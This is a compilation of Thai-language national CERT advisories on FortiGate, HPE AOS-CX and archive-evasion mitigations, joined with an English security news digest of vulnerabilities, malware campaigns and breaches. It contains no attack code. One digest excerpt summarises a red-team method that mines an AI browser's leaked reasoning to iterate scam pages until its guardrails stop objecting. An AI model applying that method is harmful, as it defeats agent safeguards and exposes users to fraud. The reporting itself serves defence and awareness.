3.5 Kaspersky
3.6 McAfee
3.7 Sophos
3.8 Trend Micro

4. แนวทางการแก้ไข

4.1 ตรวจสอบ compression method ใน ZIP header เทียบกับลักษณะข้อมูลจริง
4.2 เพิ่มกลไกตรวจจับความผิดปกติของโครงสร้างไฟล์บีบอัด
4.3 ใช้โหมด Deep Archive Inspection เพื่อตรวจจับมัลแวร์ที่ซ่อนอยู่ภายในไฟล์บีบอัด
4.5 ไม่พึ่งพา metadata ในไฟล์เพียงอย่างเดียว
4.6 เพิ่ม heuristic detection สำหรับ malformed archive
4.7 อัปเดต Antivirus และ EDR ให้เป็นเวอร์ชันล่าสุด และติดตามคำแนะนำจากผู้ผลิตผลิตภัณฑ์ด้านความปลอดภัย

5. คำแนะนำด้านความปลอดภัยเพิ่มเติม

5.1 ควรหลีกเลี่ยงการเปิดไฟล์บีบอัดจากแหล่งที่ไม่น่าเชื่อถือ
5.2 บล็อกหรือ quarantine ไฟล์ archive ที่มีโครงสร้างผิดปกติ
5.3 เฝ้าระวังไฟล์ที่แตกแล้วเกิดข้อผิดพลาด เช่น unsupported method
5.4 ตรวจสอบพฤติกรรมของโปรแกรมที่พยายามคลายข้อมูล archive แบบ programmatic
5.5 ใช้ sandbox หรือระบบวิเคราะห์มัลแวร์ก่อนเปิดไฟล์

6. แหล่งอ้างอิง

[1] https://dg.th/20agl4ntwq
[2] https://dg.th/0yopcv84xb
[3] https://dg.th/5vfbj3ypwm
[4] https://dg.th/k9z3muvrg7

1. ลักษณะและพฤติการณ์ของการโจมตี
   กลุ่มผู้โจมตีอาศัยช่องโหว่ด้านความปลอดภัยระดับวิกฤตที่เพิ่งได้รับการเปิดเผย ตลอดจนการใช้ข้อมูลบัญชีที่คาดเดาง่าย เพื่อทำการเจาะเข้าสู่อุปกรณ์ FortiGate โดยช่องโหว่ที่เกี่ยวข้องมีดังนี้:
   • CVE-2025-59718 (CVSS V3.1:9.8) [3]
   • CVE-2025-59719 (CVSS V3.1:9.8) [4] [5]
   • CVE-2026-24858 (CVSS V3.1:9.8) [6] [7]
   เป้าหมายสำคัญคือการดึงไฟล์การกำหนดค่า (Configuration files) ซึ่งมีการจัดเก็บข้อมูลบัญชีบริการ (Service Account) ที่ใช้สำหรับเชื่อมต่อกับระบบ Active Directory (AD) และ Lightweight Directory Access Protocol (LDAP)
   เมื่อผู้โจมตีได้รับข้อมูลดังกล่าว จะสามารถดำเนินการเข้าถึงสิทธิต่างๆ ได้ดังนี้:
   1.1 สร้าง บัญชีผู้ดูแลระบบภายใน (Local Administrator) ใหม่ โดยใช้ชื่อหลอกตาเช่น "support" เพื่อใช้เป็นช่องทางเข้าออกระบบได้อย่างอิสระโดยไม่มีข้อจำกัด
   1.2 แฝงตัว ในลักษณะนายหน้าจัดหาช่องทางเข้าถึง (Initial Access Broker - IAB) เพื่อรักษาสถานะในระบบและนำสิทธิ์การเข้าถึงนี้ไปแสวงหาผลประโยชน์ทางการเงิน
   1.3 ติดตั้ง เครื่องมือควบคุมระยะไกล (เช่น Pulseway หรือ MeshAgent) เพื่อขโมยฐานข้อมูลสำคัญของระบบ (NTDS.dit) และ Registry Hive ส่งออกไปยังเซิร์ฟเวอร์ภายนอก

2. แนวทางปฏิบัติเพื่อรับมือและป้องกัน
   2.1 ตรวจสอบการตั้งค่าของอุปกรณ์ FortiGate ในระบบอย่างละเอียด โดยเฉพาะบัญชีผู้ดูแลระบบที่อาจถูกสร้างขึ้นมาใหม่โดยไม่ทราบสาเหตุ และนโยบายไฟร์วอลล์ที่มีการอนุญาตสิทธิ์ข้ามโซนเครือข่ายที่ผิดปกติ
   2.2 อัปเดตระบบปฏิบัติการ เฟิร์มแวร์ และแพตช์ความปลอดภัยของอุปกรณ์ให้เป็นเวอร์ชันล่าสุดโดยทันที เพื่อ ปิดกั้น ช่องโหว่ที่อาจถูกนำมาใช้เป็นช่องทางในการโจมตี
   2.3 เฝ้าระวังการบันทึกเหตุการณ์ (Logs) อย่างใกล้ชิด ทั้งการเข้าใช้งานระบบ AD การสแกนเครือข่าย การเชื่อมต่อไปยังไอพีภายนอกที่น่าสงสัย (เช่น ผ่านพอร์ต 443) รวมถึงการติดตั้งซอฟต์แวร์ Remote Access ที่ไม่ได้รับอนุญาต
   2.4 เปลี่ยนรหัสผ่านของบัญชีบริการ (Service Account) ทั้งหมดทันที หากพบว่าอุปกรณ์ในเครือข่ายเคยมีช่องโหว่ หรือมีข้อบ่งชี้ว่าไฟล์การกำหนดค่าอาจถูกนำออกไปจากระบบ
   2.5 จำกัดการเข้าถึงหน้าการจัดการ (Management Interface) ของอุปกรณ์ โดย ปิด การเข้าถึงจากอินเทอร์เน็ตสาธารณะ (WAN) และ อนุญาต เฉพาะ IP Address ของผู้ดูแลระบบที่เชื่อถือได้เท่านั้น (Workaround เบื้องต้น)
   2.6 ระงับการใช้งานฟีเจอร์ที่เกี่ยวข้องกับช่องโหว่เป็นการชั่วคราว (Workaround) เช่น การ ปิด ระบบ FortiCloud SSO ในกรณีที่องค์กรยังไม่สามารถดำเนินการอัปเดตแพตช์ความปลอดภัยได้ทันที เพื่อ ลด ความเสี่ยงในการถูกลักลอบเข้าถึง
   อุปกรณ์ไฟร์วอลล์เปรียบเสมือนปราการด่านแรกของเครือข่าย การบริหารจัดการความเสี่ยงและอุดช่องโหว่อย่างทันท่วงที จะช่วยป้องกันความเสียหายที่อาจส่งผลกระทบในระดับโครงสร้างขององค์กรได้

แหล่งอ้างอิง
[1] https://dg.th/uvjklgarb1
[2] https://dg.th/0bi79ackmv
[3] https://dg.th/skdrzw9mav
[4] https://dg.th/vnecb1rtha
[5] https://dg.th/drpaf341u8
[6] https://dg.th/jqzaf06vbg
[7] https://dg.th/w2cxrbvk68

#CyberSecurity #FortiGate #InfoSec #CyberThreat #NetworkSecurity #Vulnerability #CyberOperations #การรักษาความมั่นคงปลอดภัยทางไซเบอร์

• CVE-2025-68613 n8n Improper Control of Dynamically-Managed Code Resources Vulnerability

ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

อ้างอิง
https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

• Apeman Cameras
  "Successful exploitation of these vulnerabilities could allow an attacker to take control of the device or view camera feeds."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-01
• Lantronix EDS3000PS And EDS5000
  "Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and execute code with root-level privileges."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-02
• Honeywell IQ4x BMS Controller
  "Successful exploitation of this vulnerability could allow an unauthorized attacker to access controller management settings, control components, disclose information, or cause a denial-of-service condition."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-03
• ICS Patch Tuesday: Vulnerabilities Fixed By Siemens, Schneider, Moxa, Mitsubishi Electric
  "Industrial giants Siemens, Schneider Electric, Mitsubishi Electric, and Moxa have published new Patch Tuesday advisories for vulnerabilities found recently in their ICS products. Siemens and Schneider Electric have each published six new advisories. Each of Schneider’s new advisories addresses one vulnerability. The company has informed customers about high-severity issues in EcoStruxure IT Data Center Expert (hardcoded credentials), EcoStruxure Power Monitoring Expert and Power Operation (local arbitrary code execution), and EcoStruxure Automation Expert (command execution and full system compromise)."
  https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-fixed-by-siemens-schneider-moxa-mitsubishi-electric/
• Ceragon Siklu MultiHaul And EtherHaul Series
  "Successful exploitation of this vulnerability could result in arbitrary file upload to the target equipment."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-04

New Tooling

• Cloud-Audit: Fast, Open-Source AWS Security Scanner
  "Running AWS security audits without a dedicated security team typically means choosing between enterprise platforms with per-check billing and generic open-source scanners that produce findings with no remediation guidance. Cloud-audit, a Python CLI tool published on GitHub by Mariusz Gebala, takes a narrower scope and attaches a fix to every finding it generates."
  https://www.helpnetsecurity.com/2026/03/11/cloud-audit-open-source-aws-security-scanner/
  https://github.com/gebalamariusz/cloud-audit

Vulnerabilities

• Fortinet, Ivanti, Intel Patch High-Severity Vulnerabilities
  "Fortinet, Ivanti, and Intel on Tuesday rolled out security fixes for dozens of vulnerabilities, including high-severity bugs that could be exploited for arbitrary code execution, privilege escalation, or security protection bypasses. Fortinet announced patches for 22 security defects across its products, including high-severity flaws in FortiWeb, FortiSwitchAXFixed, FortiManager, and FortiClientLinux. The FortiWeb, FortiSwitchAXFixed, and FortiManager issues could be exploited by remote, unauthenticated attackers to bypass the authentication rate limit or execute unauthorized code or commands."
  https://www.securityweek.com/fortinet-ivanti-intel-patch-high-severity-vulnerabilities/
• Zero Click Unauthenticated RCE In n8n: A Contact Form That Executes Shell Commands
  "Pillar Research team found a zero-click, unauthenticated RCE in n8n. Anyone who can reach a public multi-step form with an HTML rendering can execute shell commands on the server. We worked with the n8n team to fix it. If you use n8n Cloud, you're already protected. If you're self-hosting, update to 2.10.1 / 2.9.3 / 1.123.22 now. This is CVE-2026-27493: an unauthenticated, zero-click RCE affecting every n8n instance that exposes a multi-step form with an HTML rendering step that displays user input back to the submitter. We scanned for publicly accessible n8n form endpoints and identified over 50,000 potentially vulnerable forms exposed to the internet. The attack requires nothing more than a browser."
  https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands
  https://thehackernews.com/2026/03/critical-n8n-flaws-allow-remote-code.html
• CISA Adds One Known Exploited Vulnerability To Catalog
  "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2025-68613 n8n Improper Control of Dynamically-Managed Code Resources Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog
  https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-n8n-rce-flaw-exploited-in-attacks/
• 400,000 WordPress Sites Affected By Unauthenticated SQL Injection Vulnerability In Ally WordPress Plugin
  "On February 4th, 2026, we received a submission for an SQL Injection vulnerability in Ally, a WordPress plugin estimated to have more than 400,000 active installations. This vulnerability can be leveraged to extract sensitive data from the database, such as password hashes. Props to Drew Webber (mcdruid) who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This vulnerability was reported to our program just five days after it was introduced. This researcher earned a bounty of $800.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program."
  https://www.wordfence.com/blog/2026/03/400000-wordpress-sites-affected-by-unauthenticated-sql-injection-vulnerability-in-ally-wordpress-plugin/
  https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/
• DirectX, OpenFOAM, Libbiosig Vulnerabilities
  "Cisco Talos’ Vulnerability Discovery & Research team recently disclosed vulnerabilities in the BioSig Project Libbiosig library and OpenCFD OpenFOAM, as well as an unpatched vulnerability in Microsoft DirectX. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy, apart from the DirectX vulnerability."
  https://blog.talosintelligence.com/directx-openfoam-libbiosig-vulnerabilities/

Malware

• The Return Of PhantomRaven: Detecting Three New Waves Of Npm Supply Chain Attacks
  "Endor Labs identified 88 new malicious npm packages belonging to three new waves (Wave 2, 3, and 4) of the PhantomRaven campaign distributed between November 2025 and February 2026. At the time of writing, the campaign remains active: 81 of the 88 packages are still available on npm, and two of the three new command-and-control servers continue to operate. PhantomRaven is a software supply chain attack that uses Remote Dynamic Dependencies (RDD) to hide credential-stealing malware in non-registry dependencies that bypass standard security scanning. The first wave affecting 126+ packages with over 86,000 downloads, was first described by Koi Security in October 2025."
  https://www.endorlabs.com/learn/return-of-phantomraven
  https://www.bleepingcomputer.com/news/security/new-phantomraven-npm-attack-wave-steals-dev-data-via-88-packages/
• Weaponizing Telegram Bots: How Threat Actors Exfiltrate Credentials
  "Telegram is a free, online instant messenger platform that is also commonly abused by threat actors for a wide range of malicious activities. One of Telegram’s notable features is its extensive collection of web APIs, one of which is used to interact with automated bot accounts. Notably, Telegram bot accounts are still capable of posting messages in chats and uploading arbitrary files such as screenshots or archives of stolen information. As such, Telegram bots are often used by threat actors as a method of data exfiltration through a technically legitimate service."
  https://cofense.com/blog/weaponizing-telegram-bots-how-threat-actors-exfiltrate-credentials
• Inside p1bot: A Vishing Platform Weaponizing ElevenLabs
  "The threat intelligence community has been sounding the alarm on AI-powered social engineering for over a year. OpenAI's quarterly disruption reports have documented threat actors using LLMs to craft phishing lures, generate fake resumes, and scale influence operations. Google's Mandiant team published research in 2024 showing how AI-powered voice spoofing has been incorporated into red team operations, demonstrating just how convincing synthetic voices have become. Academic researchers have even built proof-of-concept vishing bots using off-the-shelf APIs (OpenAI's GPT for conversation, ElevenLabs for voice synthesis, Twilio for telephony) and demonstrated them against human subjects."
  https://www.miragesecurity.ai/blog/inside-p1bot-vishing-platform-weaponizing-elevenlabs
  https://www.helpnetsecurity.com/2026/03/11/researchers-uncover-ai-powered-vishing-platform/
• Phishers Hide Scam Links With IPv6 Trick In “free Toothbrush” Emails
  "A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link. Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this: https://{string}.blob.core.windows.net/{same string}/1.html to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example: http://[::ffff:5111:8e14]/"
  https://www.malwarebytes.com/blog/scams/2026/03/phishers-hide-scam-links-with-ipv6-trick-in-free-toothbrush-emails
• Iran Conflict Drives Heightened Espionage Activity Against Middle East Targets
  "On 28 February 2026, the US and Israel conducted strikes targeting assets inside Iran, in a campaign the US called Operation Epic Fury. According to public sourcing, the attacks targeted Iranian missiles and air defenses, other military infrastructure, and Iranian leadership. Iran responded with retaliatory missile and drone strikes in the region, targeting US embassies and military installations. As the war continues into its second week, several Iranian hacktivist groups and personas have claimed responsibility for various disruptive operations. Iranian espionage-focused threat groups remain somewhat active despite the Iranian government’s shutdown of the internet immediately following the initial US and Israeli attacks."
  https://www.proofpoint.com/us/blog/threat-insight/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targets
• “AgenticBlabbering”: How AI Browsers’ Verbose Reasoning Fuels The Ultimate Scamming Machine
  "AI Browsers are not just browsing for us, they are browsing as us, with full access to our personal private data. And while they do it, they also talk way too much. This is AgenticBlabbering: a stream of internal reasoning, tool calls, screenshots, and security hesitations that reveals how the browser decides what is “safe enough” to click. By sniffing Comet’s agent traffic, we got a first-of-its-kind view into how an AI Browser actually thinks, and how much of that thinking leaks out. Then we put the black hat on and weaponized it. We fed that blabbering into a GAN-style loop that auto-generates scam flows, critiques and reshapes them using the agent’s own reactions, and iterates until the guardrails go quiet. We expected it to take hours."
  https://guard.io/labs/agenticblabbering---how-ai-browsers-verbose-reasoning-fuels-the-ultimate-scamming-machine
  https://thehackernews.com/2026/03/researchers-trick-perplexitys-comet-ai.html
• 5 Malicious Rust Crates Posed As Time Utilities To Exfiltrate .env Files
  "Socket’s Threat Research Team uncovered a coordinated supply chain campaign in the Rust ecosystem involving five malicious crates: chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync. RustSec and the GitHub Advisory Database document that crates.io security yanked four of these packages shortly after publication. The fifth package, chrono_anchor, shows the threat actor is adapting. It introduced minor obfuscation and operational changes that reduced obvious indicators and helped it remain listed on crates.io until we identified and reported it."
  https://socket.dev/blog/5-malicious-rust-crates-posed-as-time-utilities-to-exfiltrate-env-files
  https://thehackernews.com/2026/03/five-malicious-rust-crates-and-ai-bot.html

Breaches/Hacks/Leaks

• Medtech Giant Stryker Offline After Iran-Linked Wiper Malware Attack
  "Leading medical technology company Stryker has been hit by a wiper malware attack claimed by Handala, an Iranian-linked and pro-Palestinian hacktivist group. The medtech giant manufactures a range of products, including surgical and neurotechnology equipment. With over 53,000 employees, Stryker is a Fortune 500 company that reported global sales of $22.6 billion in 2024. Handala says they stole 50 terabytes of data before wiping tens of thousands of systems and servers across the company's network, forcing Stryker to shut down in "an unprecedented blow.""
  https://www.bleepingcomputer.com/news/security/medtech-giant-stryker-offline-after-iran-linked-wiper-malware-attack/
  https://therecord.media/stryker-cyberattack-iran-hackers
  https://www.bankinfosecurity.com/medtech-firm-stryker-disrupted-by-pro-iran-hackers-a-30980
  https://hackread.com/iran-handala-hackers-verifone-stryker-hacks/
  https://www.securityweek.com/medtech-giant-stryker-crippled-by-iran-linked-hacker-attack/
  https://securityaffairs.com/189304/hacktivism/pro-palestinian-hacktivist-group-handala-targets-stryker-in-global-disruption.html
  https://www.theregister.com/2026/03/11/us_medtech_firm_stryker_cyberattack_iran/
• Xygeni GitHub Action Compromised Via Tag Poison
  "An unidentified threat actor breached one of application security vendor Xygeni's GitHub Actions this month via tag poisoning. Xygeni, which sells a number of AI-powered AppSec products, said in a March 10 security incident report that it "detected suspicious activity affecting the repository used to publish the xygeni/xygeni-action GitHub Action." The attacker used pull requests in an effort to introduce malicious code (a compact command-and-control implant) into the repository, though Xygeni said the attempts were blocked via existing branch detection rules."
  https://www.darkreading.com/application-security/xygeni-github-action-compromised-via-tag-poison
  https://xygeni.io/blog/security-incident-report-xygeni-action-github-action-compromise/
• 238,000 Impacted By Bell Ambulance Data Breach
  "Ambulance services provider Bell Ambulance is notifying nearly 238,000 individuals that their personal, financial account, medical, and health insurance information was compromised in a February 2025 data breach. The Milwaukee, Wisconsin-based healthcare organization detected the network intrusion on February 13, 2025, and disclosed the incident on April 14, roughly a month after the Medusa ransomware gang claimed responsibility for it. Bell Ambulance said at the time that 114,000 people had been impacted."
  https://www.securityweek.com/238000-impacted-by-bell-ambulance-data-breach/
  https://therecord.media/235000-affected-cyberattack-ambulance-provider
• Michelin Confirms Data Breach Linked To Oracle EBS Attack
  "Tire giant Michelin has confirmed a data breach stemming from the massive cybercrime campaign that targeted organizations using Oracle’s E-Business Suite (EBS) solution. The Cl0p ransomware and extortion group has taken credit for the EBS hacking campaign, which involved the exploitation of zero-day vulnerabilities to gain access to data stored by the targeted organizations in Oracle’s enterprise management software. It’s worth noting that while Cl0p serves as the public-facing extortion brand for the Oracle EBS campaign, cybersecurity researchers believe the operation was driven by a sophisticated cluster of threat actors, most notably FIN11."
  https://www.securityweek.com/michelin-confirms-data-breach-linked-to-oracle-ebs-attack/
• Iran-Linked Hackers Claim Cyberattack On Albania’s Parliament Email Systems
  "Albania’s parliament said late Tuesday that it had been targeted by a “sophisticated” cyberattack aimed at deleting data and compromising several internal systems. In a statement shared with local media, parliament said its main systems and official website remained operational but confirmed that internal email services used by the parliamentary administration had been temporarily suspended. The disruption affected both incoming and outgoing communications."
  https://therecord.media/iran-linked-hackers-claim-cyberattack-albania-parliament

General News

• The Bridge To AI Value Will Be Built, Not Bought
  "The conversation around artificial intelligence often feels like a pendulum swinging between two extremes: a utopian future of effortless productivity and a dystopian vision of mass job displacement and hollowed-out economic growth. This "ghost GDP" thesis—the idea that AI will create statistical gains that fail to circulate through the real economy—stokes anxiety for business leaders and the public alike. But the facts on the ground from enterprises tell a different story. It’s a more pragmatic, grounded and ultimately more optimistic narrative. The evidence doesn't point to a speculative bubble or a workforce collapse. Instead, it shows a global economy in a period of foundational construction."
  https://www.cognizant.com/us/en/insights/insights-blog/bridge-to-ai-value-will-be-built-not-bought
  https://www.bankinfosecurity.com/plug-and-play-ai-myth-for-enterprises-a-30977
• Agentic AI Security: Why You Need To Know About Autonomous Agents Now
  "Agentic AI is making headlines worldwide for its potential force-multiplying capabilities, and organizations are understandably intrigued by how it can improve throughput and capabilities. However, as with any technological revolution, unforeseen issues are inevitable, and agentic AI is no exception. In organizations, these issues often arise from deploying personal assistants like OpenClaw or AI agents designed to optimize business and IT processes. Additionally, when personal assistants interact with “social networks” such as Moltbook, they introduce many hidden threats for organizations. These specific risks fall beyond the scope of this article, and will be addressed in a future blog."
  https://blog.talosintelligence.com/agentic-ai-security-why-you-need-to-know-about-autonomous-agents-now/
• Middle East Conflict Highlights Cloud Resilience Gaps
  "Businesses that counted on the cloud's distributed nature to guarantee their data's availability have had a cold dose of reality during the past two weeks. On Feb. 28, following military strikes by the US and Israel, Iran's Internet traffic fell to less than 1% across all major networks in the country, according to Cloudflare Radar, which tracks Internet traffic internationally. Within 24 hours, Iran responded, targeting infrastructure in the United Arab Emirates, Bahrain, and other Gulf States, hitting two Amazon Web Services' facilities in the UAE with drone strikes, while a third facility in Bahrain suffered "physical impacts to [its] infrastructure," Amazon Web Services stated March 2 on its AWS Health Dashboard."
  https://www.darkreading.com/cyber-risk/middle-east-conflict-highlights-cloud-resilience-gaps
• France: National Cybersecurity Agency Reports Ransomware Attack Drop In 2025
  "The French Cybersecurity Agency (ANSSI) has confirmed the decline of known ransomware attacks in 2025, in part due to successful law enforcement operations. The latest edition of the agency’s annual threat report, published on March 11, dives into the range of cyber threats that French public and private organizations have faced in 2025. According to ANSSI data, there were 128 ransomware attacks reported in France in 2025, slightly fewer than the 141 such attacks recorded in 2024."
  https://www.infosecurity-magazine.com/news/france-anssi-ransomware-attack/
• Cyber-Attacks On UK Firms Increase At Four Times Global Rate
  "UK organizations were hit by far fewer cyber-attacks in February than the global average, but the year-on-year (YoY) increase was nearly four times the growth rate worldwide, according to Check Point. The security vendor’s February 2026 Global Threat Intelligence report revealed that it blocked an average of 2086 cyber-attacks per organization per week globally, a 9.8% year-on-year (YoY) increase. In the UK, the figure was only 1504 per week, but that represented a 36% YoY increase. Education, energy & utilities, government, healthcare and financial services were among the most frequently targeted sectors in the UK."
  https://www.infosecurity-magazine.com/news/cyberattacks-uk-firms-increase/
• How To 10x Your Vulnerability Management Program In The Agentic Era
  "The age of agentic cyberattacks isn’t coming; it’s here. In November 2025, Anthropic disclosed that a Chinese threat actor had weaponized Claude to launch an agentic cyberattack, operating autonomously with minimal human intervention. The artificial intelligence (AI) conducted reconnaissance, exploit development, credential theft, lateral movement and data exfiltration at a speed that no human team could match."
  https://www.securityweek.com/how-to-10x-your-vulnerability-management-program-in-the-agentic-era/
• Automotive Tech: A Vast New Cyber Attack Surface
  "For decades, the biggest risks associated with cars were tangible and immediate. Vehicles crashed. Engines failed. People were injured or killed. In response, and under pressure from regulatory agencies and insurers, automakers poured enormous effort into physical safety: crash testing, safety standards, recalls, airbags, and structural engineering. Over time, safety became non‑negotiable."
  https://blog.barracuda.com/2026/03/11/automotive-tech-new-cyber-attack-surface
• SOC Threat Radar — March 2026
  "Identity-based threats continue to rise — particularly those involving anomalous logins using stolen credentials (see SOC Threat Radar — December 2025). During February, around one in every 16 suspicious logins came from Romania. This is an unexpected and anomalous increase compared to previous months, which is a clear indicator of suspicious activity."
  https://blog.barracuda.com/2026/03/11/soc-threat-radar-march-2026
• Global Law Enforcement Agencies, With Support From Meta, Disrupt Major Criminal Scam Networks Based In Southeast Asia
  "Online scams have become significantly more sophisticated and industrialized in recent years, with criminal networks often based in Southeast Asia in countries like Cambodia, Myanmar, and Laos running what amount to full-scale business operations. These operations cause real harm — they upend lives, destroy trust, and are deliberately designed to avoid detection and disruption. The work to protect people against scammers is never done, and requires ongoing collaboration with partners across the tech industry and law enforcement to ensure a safer experience for everyone online."
  https://about.fb.com/news/2026/03/meta-global-law-enforcement-disrupt-major-southeast-asia-criminal-scam-networks/
  https://thehackernews.com/2026/03/meta-disables-150k-accounts-linked-to.html
  https://www.theregister.com/2026/03/11/meta_international_cops_ai_scammers/
• What Boards Must Demand In The Age Of AI-Automated Exploitation
  "“You knew, and you could have acted. Why didn’t you?” This is the question you do not want to be asked. And increasingly, it’s the question leaders are forced to answer after an incident. For years, many executive teams and boards have treated a large vulnerability backlog as an uncomfortable but tolerable fact of life: “we’ve accepted the risk.” If you’ve ever seen a report showing thousands (or tens of thousands) of open Highs and Critical CVEs, you’ve probably also heard the usual rationalizations from folks that would rather look the other way: we have other priorities, this will take years of engineering time to fix, how do you know these are really Critical, we’re still prioritizing, we’ll get to it."
  https://thehackernews.com/2026/03/what-boards-must-demand-in-age-of-ai.html
• Meta Says It Culled Millions Of Scam Ads Amid Accusations That It Profits From Them
  "Meta said it removed 159 million scam ads in 2025, amid calls from U.S. lawmakers for an investigation into the company’s “facilitation of and profiting from” fraudulent advertising. The company said it also removed 10.9 million Facebook and Instagram accounts associated with criminal scam centers as it rolled out new tools aimed at stopping online fraud, something Meta describes as “one of the fastest-growing forms of organized crime globally.” Americans lost more than $10 billion to scams in 2023, according to the Federal Trade Commission (FTC), with hundreds of billions stolen globally through schemes that often begin on social media."
  https://therecord.media/meta-scam-advertising-crackdown

อ้างอิง
Electronic Transactions Development Agency (ETDA)

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

1. รายละเอียดช่องโหว่ [1]
   CVE-2026-23813 (CVSS V3.1:9.8) Authentication Bypass ช่องโหว่ในหน้า Web Management ของ AOS-CX อาจถูกใช้โดยผู้โจมตีจากระยะไกลที่ไม่ต้องมีสิทธิ์ใด ๆ เพื่อข้ามการยืนยันตัวตน และบางกรณีอาจนำไปสู่การรีเซ็ตรหัสผ่านผู้ดูแลระบบได้ ส่งผลให้ผู้โจมตีอาจยึดสิทธิ์การบริหารอุปกรณ์เครือข่าย เช่น เปลี่ยนค่าคอนฟิก Policy, ACL, VLAN เสี่ยงต่อการถูกดักฟังหรือเปลี่ยนเส้นทางการสื่อสารภายในเครือข่าย และขยายผลไปยังระบบสำคัญอื่น กระทบความต่อเนื่องทางธุรกิจหากอุปกรณ์เครือข่ายหลักถูกปรับค่าหรือทำให้ไม่พร้อมใช้งาน

2. เวอร์ชันที่ได้รับผลกระทบ
   • AOS-CX 10.17.0001 และต่ำกว่า
   • AOS-CX 10.16.1020 และต่ำกว่า
   • AOS-CX 10.13.1160 และต่ำกว่า
   • AOS-CX 10.10.1170 และต่ำกว่า

3. เวอร์ชันที่แก้ไขแล้ว [2]
   • AOS-CX 10.17.1001 ขึ้นไป
   • AOS-CX 10.16.1030 ขึ้นไป
   • AOS-CX 10.13.1161 ขึ้นไป
   • AOS-CX 10.10.1180 ขึ้นไป

4. กรณีไม่สามารถอัปเดตได้ทันที (Mitigation ชั่วคราว)
   4.1 จำกัดการเข้าถึงด้วย Access Control Lists (ACLs): ตั้งค่า Control Plane ACLs ให้อนุญาตเฉพาะ IP ที่เชื่อถือได้ในการเข้าถึง HTTP/HTTPS หรือ REST สำหรับบริหารจัดการ
   4.2 แยกเครือข่ายบริหารจัดการ: จัดให้อินเทอร์เฟซบริหารจัดการอยู่ใน VLAN หรือ Layer 2 segment ที่แยกส่วนชัดเจน เพื่อลดความเสี่ยงจากการเข้าถึงโดยไม่ได้รับอนุญาต
   4.3 ปิดการใช้งาน Web UI บนพอร์ตที่ไม่จำเป็น: ปิดอินเทอร์เฟซ HTTP/HTTPS บนพอร์ตที่มีการส่งข้อมูลทั่วไป (Routed ports) หากไม่มีความจำเป็นต้องใช้งานสำหรับการบริหารจัดการ

5. แหล่งอ้างอิง
   5.1 https://dg.th/g08wydt3ae
   5.2 https://dg.th/z67ye0d3v4

ความเสี่ยงที่พบบ่อย

• ถูกหลอกให้กรอกชื่อผู้ใช้/รหัสผ่านผ่านอีเมลหรือเว็บปลอม (phishing)
• ใช้รหัสผ่านซ้ำหลายระบบ
• ไม่เปิดใช้ MFA
• ใช้ Wi-Fi สาธารณะหรือเครือข่ายบ้านที่ตั้งค่าไม่ปลอดภัย
• ใช้อุปกรณ์ส่วนตัวหรือโปรแกรมรีโมตที่องค์กรไม่ได้อนุญาต
• ไม่อัปเดตระบบหรือ VPN client ให้เป็นเวอร์ชันล่าสุด

ดังนั้นก่อนล็อกอินเข้าระบบงาน อย่าลืม

• ใช้ VPN ขององค์กร
• เปิด MFA
• ไม่ใช้ Wi-Fi สาธารณะ
• อัปเดตเครื่องและแอปเสมอ
• ใช้เฉพาะโปรแกรมที่องค์กรอนุญาต

หากมีแจ้งเตือนล็อกอินหรือ MFA ที่ไม่ได้ทำเอง ให้รีบแจ้งผู้ดูแลระบบทันที

WFH อย่างปลอดภัย ต้องระวังมากกว่าแค่เรื่องรหัสผ่าน
ด้วยความห่วงใยจาก NCSA Thailand

#ThaiCERT #CyberSecurity #WorkFromHome #WFH #VPN #MFA #Phishing #CyberHygiene

แหล่งอ้างอิง

• https://dg.th/rzphgu08bt
• https://dg.th/ctpdoxrqe3
• https://dg.th/bk2973nuhy
• https://dg.th/vwiq8zekor
• https://dg.th/ua39lkwchm
  

• HPE Warns Of Critical AOS-CX Flaw Allowing Admin Password Resets
  "Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues. AOS-CX is a cloud-native network operating system (NOS) developed by HPE subsidiary Aruba Networks for the company's CX-series campus and data center switch devices. The most severe security flaw today is a critical authentication bypass vulnerability (tracked as CVE-2026-23813) that attackers without privileges can exploit in low-complexity attacks to reset admin passwords."
  https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/
• SAP Patches Critical FS-QUO, NetWeaver Vulnerabilities
